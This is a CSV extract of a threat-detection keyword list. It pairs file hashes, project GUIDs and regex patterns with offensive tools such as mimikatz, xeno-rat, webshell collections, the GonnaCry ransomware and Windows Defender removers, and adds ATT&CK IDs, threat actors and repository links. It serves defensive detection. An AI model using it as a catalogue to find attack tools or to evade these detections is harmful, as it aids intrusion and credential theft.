"*a12e94a01c3d1cee2942d15b20d30b9574eb23418b20563c134565ead57ed96f*",".{0,1000}a12e94a01c3d1cee2942d15b20d30b9574eb23418b20563c134565ead57ed96f.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","32233"
"*A138FC2A-7BFF-4B3C-94A0-62A8BC01E8C0*",".{0,1000}A138FC2A\-7BFF\-4B3C\-94A0\-62A8BC01E8C0.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","32236"
"*a13985069fc38a1a2d154f9da033a5d6fec33c74f29b301bd283459207bfd4ac*",".{0,1000}a13985069fc38a1a2d154f9da033a5d6fec33c74f29b301bd283459207bfd4ac.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","32237"
"*A13BGD =  base64.b64decode(A13BGD)*",".{0,1000}A13BGD\s\=\s\sbase64\.b64decode\(A13BGD\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","32238"
"*a13f4672fc13262b372d0ab5c186851f6bb2ec1a76a68f1eb3e85ac9478f2c91*",".{0,1000}a13f4672fc13262b372d0ab5c186851f6bb2ec1a76a68f1eb3e85ac9478f2c91.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32239"
"*a15bb4faba020d217016fde6e231074a*",".{0,1000}a15bb4faba020d217016fde6e231074a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","32241"
"*a1632c4ac9e42fa8bd4f5c393bc40cbc32f9dda8c18bf57e91d575df3c47a7d9*",".{0,1000}a1632c4ac9e42fa8bd4f5c393bc40cbc32f9dda8c18bf57e91d575df3c47a7d9.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32242"
"*a1666ab37da97129746e6efae58c29e4796ad1427d41326061f80f9706ec3083*",".{0,1000}a1666ab37da97129746e6efae58c29e4796ad1427d41326061f80f9706ec3083.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","32243"
"*a1670329540c5f64b2f6bd9c192d776256616f94622a002152e4e93515341a75*",".{0,1000}a1670329540c5f64b2f6bd9c192d776256616f94622a002152e4e93515341a75.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","32244"
"*a16a8ed5999b3b90c7f5a7a80b7a55fe62941d3a1300ea8f0fcdd8550e93a947*",".{0,1000}a16a8ed5999b3b90c7f5a7a80b7a55fe62941d3a1300ea8f0fcdd8550e93a947.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","32245"
"*a172c88c5af8e591bd8aa539973f62f242b368157ea187d9dbfee8616b51d5c1*",".{0,1000}a172c88c5af8e591bd8aa539973f62f242b368157ea187d9dbfee8616b51d5c1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","32246"
"*A17656B2-42D1-42CD-B76D-9B60F637BCB5*",".{0,1000}A17656B2\-42D1\-42CD\-B76D\-9B60F637BCB5.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","#GUIDproject","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","32248"
"*a17a13c48d23f7010a1da7f4be455dae938db574ebbd7882de649792f3959df5*",".{0,1000}a17a13c48d23f7010a1da7f4be455dae938db574ebbd7882de649792f3959df5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32250"
"*a17d3b89f61fdfaa034da9471ede5e346af8f5ef897d792487c2a726a071baae*",".{0,1000}a17d3b89f61fdfaa034da9471ede5e346af8f5ef897d792487c2a726a071baae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32251"
"*a17dd521d044342b7866e4175f839e1418997d8143db358f6c6349ffb144e5e9*",".{0,1000}a17dd521d044342b7866e4175f839e1418997d8143db358f6c6349ffb144e5e9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32252"
"*a183c4ae65ed9747af2c8d5d84e222df3982482d1f6130df40cab381cd47f0fe*",".{0,1000}a183c4ae65ed9747af2c8d5d84e222df3982482d1f6130df40cab381cd47f0fe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","32253"
"*a18a2e9a870deb66397ea527ca071bcc74ebb7789b7aeec4a179ab13a1674a00*",".{0,1000}a18a2e9a870deb66397ea527ca071bcc74ebb7789b7aeec4a179ab13a1674a00.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","32254"
"*a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51*",".{0,1000}a18ad37ac14721d1aab3478bdb2d5534b5035dfb9b3fa5d0945f4d5252936e51.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","32255"
"*a19a1c24514a2b09c592a42fd5e813cdea511507f809a57e31067ab6f1296bf3*",".{0,1000}a19a1c24514a2b09c592a42fd5e813cdea511507f809a57e31067ab6f1296bf3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32257"
"*a19ddb663db4b66ea06b8cf9dae66f6988e0a70c07cf9159e1c6abc01c415f95*",".{0,1000}a19ddb663db4b66ea06b8cf9dae66f6988e0a70c07cf9159e1c6abc01c415f95.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","32258"
"*a19fbec8a7ecca1ba56daec33727923e722576d5c7fcbc92ff86149ff4f2d425*",".{0,1000}a19fbec8a7ecca1ba56daec33727923e722576d5c7fcbc92ff86149ff4f2d425.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","32259"
"*A1A949A4-5CE4-4FCF-A3B9-A2290EA46086*",".{0,1000}A1A949A4\-5CE4\-4FCF\-A3B9\-A2290EA46086.{0,1000}","offensive_tool_keyword","ShimDB","Shim database persistence (Fin7 TTP)","T1546.011","TA0003","N/A","N/A","Persistence","https://github.com/jackson5sec/ShimDB","1","0","#GUIDproject","N/A","9","1","37","10","2020-02-25T09:41:53Z","2018-06-21T00:38:10Z","32261"
"*a1b10058ecfda37d1e138537856103279a326ce5bf8fa3ac1ab8909aed8632f0*",".{0,1000}a1b10058ecfda37d1e138537856103279a326ce5bf8fa3ac1ab8909aed8632f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32263"
"*a1b25d3133a37cefe944c0082272520694f00d4e233e7644d0e2897d433f1bf5*",".{0,1000}a1b25d3133a37cefe944c0082272520694f00d4e233e7644d0e2897d433f1bf5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32264"
"*a1b2d9ea6e99d95f0e69e4aed2008823f52a7bbea2e1e1a102e8ab2fcc370829*",".{0,1000}a1b2d9ea6e99d95f0e69e4aed2008823f52a7bbea2e1e1a102e8ab2fcc370829.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","32265"
"*a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d*",".{0,1000}a1b3d36a9cc4bc118c646ae5430a6e0fc811f2ec3614a3de9682b5c07eaade2d.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","32266"
"*a1b8bf87544be53073f60ca03c4e1df5361cc7e54b4d32b30e55ba8e1f38f457*",".{0,1000}a1b8bf87544be53073f60ca03c4e1df5361cc7e54b4d32b30e55ba8e1f38f457.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","32267"
"*a1bba1fc539fed1fa694c030b340435fe309474debf5e2c599d3d4fd3b972a47*",".{0,1000}a1bba1fc539fed1fa694c030b340435fe309474debf5e2c599d3d4fd3b972a47.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","32268"
"*a1be92f17090edca27bbb0af8e9ac44b97d7a2dd15b66d09e1a6a6b237ace336*",".{0,1000}a1be92f17090edca27bbb0af8e9ac44b97d7a2dd15b66d09e1a6a6b237ace336.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","32270"
"*a1c419116396cb01b6dadedbff3b140aa16e49d08c3e09f5da89a057982a5300*",".{0,1000}a1c419116396cb01b6dadedbff3b140aa16e49d08c3e09f5da89a057982a5300.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","32272"
"*a1ca98f25cf4319995603b9cf1869da4a0a82c1747e01fe4714d1c4b5faaeef8*",".{0,1000}a1ca98f25cf4319995603b9cf1869da4a0a82c1747e01fe4714d1c4b5faaeef8.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","32273"
"*a1ce03c2907bdfc7be8ab37b967961a4adb4c2764bbb0f42afea773d1f89f666*",".{0,1000}a1ce03c2907bdfc7be8ab37b967961a4adb4c2764bbb0f42afea773d1f89f666.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","32275"
"*a1dcb84528551c983c11159b99c9d9ba1d3aa75659d9a16a4ca8204a6ada397d*",".{0,1000}a1dcb84528551c983c11159b99c9d9ba1d3aa75659d9a16a4ca8204a6ada397d.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","32278"
"*a1dd724e09ca85a8265c4486f699ab32882e7204a09f895397ab0fb02e37559e*",".{0,1000}a1dd724e09ca85a8265c4486f699ab32882e7204a09f895397ab0fb02e37559e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","32279"
"*a1e4912be7e7d1db5247a326fec21f847d254d87ed253ad2b9de085a66d5eb13*",".{0,1000}a1e4912be7e7d1db5247a326fec21f847d254d87ed253ad2b9de085a66d5eb13.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","32280"
"*a1eae60e964d13208a3305dcaf3d24ab8137ff67baf575200fd8d67e92c0f2ae*",".{0,1000}a1eae60e964d13208a3305dcaf3d24ab8137ff67baf575200fd8d67e92c0f2ae.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","32281"
"*A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0*",".{0,1000}A1ECD50DA8AAE5734A5F5C4A6A951B5F3C99CC4FB939AC60EF5EE19896CA23A0.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#filehash","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","32282"
"*a1f112b27e1d963f44316f29f6656a85221e6138afcb90f5a6bbcea6525b69fc*",".{0,1000}a1f112b27e1d963f44316f29f6656a85221e6138afcb90f5a6bbcea6525b69fc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","32283"
"*A1F54816-3FBA-4A71-9D26-D31C6BE9CF01*",".{0,1000}A1F54816\-3FBA\-4A71\-9D26\-D31C6BE9CF01.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","32285"
"*a1f8ecfc8b1e67d081057d151ae638191b5b39f929c1f0447af69e23476bca1c*",".{0,1000}a1f8ecfc8b1e67d081057d151ae638191b5b39f929c1f0447af69e23476bca1c.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","32286"
"*a1fd85d3ba3ffa17a7a3b7b484563f528746ef482ca052d0499072c5e0327308*",".{0,1000}a1fd85d3ba3ffa17a7a3b7b484563f528746ef482ca052d0499072c5e0327308.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32289"
"*a201bc3c2d47775b39cd90b32eb390e7*",".{0,1000}a201bc3c2d47775b39cd90b32eb390e7.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","32292"
"*a2041f36d6034a45beb519ff59fba80d6e7f6d0225b4123008d0dced4d8d6d87*",".{0,1000}a2041f36d6034a45beb519ff59fba80d6e7f6d0225b4123008d0dced4d8d6d87.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32294"
"*a2090197c5cf82c6799cf7f8f7f1d0d42436882c67814b70d458c4ae8e9c7e32*",".{0,1000}a2090197c5cf82c6799cf7f8f7f1d0d42436882c67814b70d458c4ae8e9c7e32.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","32295"
"*a20a99c4f1693911d793608704b7b50c69fea98c091ff2cfd936227374d3d83d*",".{0,1000}a20a99c4f1693911d793608704b7b50c69fea98c091ff2cfd936227374d3d83d.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","32296"
"*a20e531b0117f484e0b2aa0debccc8edc597fbaf43578cc1c862eb98fb6a849d*",".{0,1000}a20e531b0117f484e0b2aa0debccc8edc597fbaf43578cc1c862eb98fb6a849d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","32298"
"*A2107C86-7CB5-45EE-89E8-1BC7261F7762*",".{0,1000}A2107C86\-7CB5\-45EE\-89E8\-1BC7261F7762.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","32300"
"*A220F564-41CB-46F5-9938-FEFD87819771*",".{0,1000}A220F564\-41CB\-46F5\-9938\-FEFD87819771.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","Dispossessor","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","#GUIDproject","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A","32303"
